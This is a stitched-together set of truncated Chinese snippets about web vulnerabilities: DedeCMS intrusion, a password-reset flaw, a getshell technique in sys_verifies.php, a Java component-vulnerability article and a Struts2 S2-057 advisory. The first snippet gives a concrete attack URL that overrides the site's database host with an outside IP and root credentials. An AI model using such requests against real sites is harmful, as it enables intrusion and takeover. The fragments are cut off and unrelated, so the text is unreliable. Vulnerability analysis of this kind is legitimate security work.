入侵步驟如下：http://www.xx.com/織夢網站后臺/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_db

?0x00 前言 早上瀏覽sec-news，發現錦行信息安全發布了一篇文章《【漏洞分析】 織夢前臺任意用戶密碼修改》，看完之后就想著自己復現一下。 該漏洞的精髓是php的弱類型比較，'0.0' == '0'，也有一定的限制，只對沒有

在這個帖子里我把兩個洞一起寫出來。 第一個是常見的思路，把語句寫入inc文件，然后在其他的include語句中，包含了惡意代碼進而getshell。漏洞代碼在:/dede/sys_verifies.php 代碼如下： else if ($action == 'getfiles') { if(!iss

作者 | 棧長來源 | Java技術棧開源界最近很熱鬧啊，各個主流軟件或框架漏洞頻發，比如像 Struts2、FastJSON、Dubbo、Redis、Tomcat 等都存在各種各樣的漏洞。不要使用含有漏洞的組件每次也都被評為 OWASP 10 大安全漏洞之一。光這半年以來，棧長知道的&#x

网安引领时代，弥天点亮未来0x00漏洞简述2018年8月22日，Apache Strust2发布最新安全公告，Apache Struts2存在远程代码执行的高危漏洞(S2-057/CVE-2018-11776)。该漏洞是由于在Struts2开发框架中使用namespace功能定义XML配置时，namespace值未被设